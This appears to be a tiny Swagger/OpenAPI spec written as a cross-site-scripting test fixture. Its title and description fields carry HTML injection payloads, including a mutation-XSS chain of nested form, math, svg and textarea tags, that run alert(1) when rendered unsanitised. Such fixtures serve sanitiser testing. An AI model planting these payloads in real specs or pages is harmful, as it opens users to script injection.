swagger: '3.10.0'
info:
  title: XSS testAS "</textarea><img onerror=alert(1) src=1>
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>"></form>
